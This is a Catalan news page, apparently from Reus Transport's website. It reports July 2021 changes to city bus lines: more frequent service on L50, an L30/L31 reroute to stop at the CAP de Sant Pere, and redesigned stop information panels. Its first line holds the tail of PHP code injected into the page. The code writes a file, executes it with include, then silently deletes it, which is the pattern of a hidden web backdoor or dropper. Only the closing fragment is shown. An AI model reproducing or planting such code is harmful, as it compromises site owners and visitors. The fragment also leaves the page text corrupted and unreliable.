");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Canvis a les línies de Reus Transport: més servei a la L50 i canvi de recorregut a les L30 i L31
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Canvis a les línies de Reus Transport: més servei a la L50 i canvi de recorregut a les L30 i L31 (05/07/2021)

Reus Transport modifica horaris i recorreguts que afecten a tres línies de la xarxa municipal de bus urbà. Els canvis són efectius des del 28 de juny,

D’una banda, la Línia 50, que connecta el centre amb l’àrea del Tecnoparc i l’Aeroport de Reus, millora la freqüència de pas amb un trajecte de només una hora, de manera que el servei esdevé més regular i es guanya una expedició al dia. No es modifica cap parada ni el recorregut de la línia.

D’altra banda, es modifica el recorregut de les Línies 30 i 31 perquè l’autobús pari al CAP de Sant Pere. Quan l’autobús surti d’Oques no continuarà pel camí de l’Aleixar com feia ara, sinó que ho farà pel passeig Sunyer, el camí de Riudoms i cap a l’avinguda de Països Catalans. Aquest canvi preveu dues noves parades al CAP de Sant Pere i a Països Catalans. Amb aquesta modificació, els usuaris del bus des de Pelai o Sol i Vista podran anar directes al centre sanitari.

La regidora d’Urbanisme i consellera delegada de Reus Transport, Marina Berasategui, afirma: «Arran de la petició dels veïns de Sol i Vista per accedir directament al CAP amb transport públic, vam estudiar la viabilitat del canvi i ara és possible fer-ho. I amb l’inici de l’estiu, també guanyem freqüència de pas a la L50. Petits canvis que ens ajuden a millorar el servei de transport urbà dia a dia i a atendre les demandes de la ciutadania.»

A més, a partir del dia 30 de juny, es modifica la informació de Reus Transport als monòlits instaŀlats a les parades, fent-la més accesible per als usuaris i endreçant-la a partir de tres preguntes: On sóc? Amb un plànol geolocalitzat i la ubicació de la parada; on vaig? Amb els esquemes de cada línia i la ubicació de la parada al plànol general de la xarxa de transport municipal; i quan? Amb els horaris de pas de cada línia que passa per la parada en qüestió.

Font: Reus Transport

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona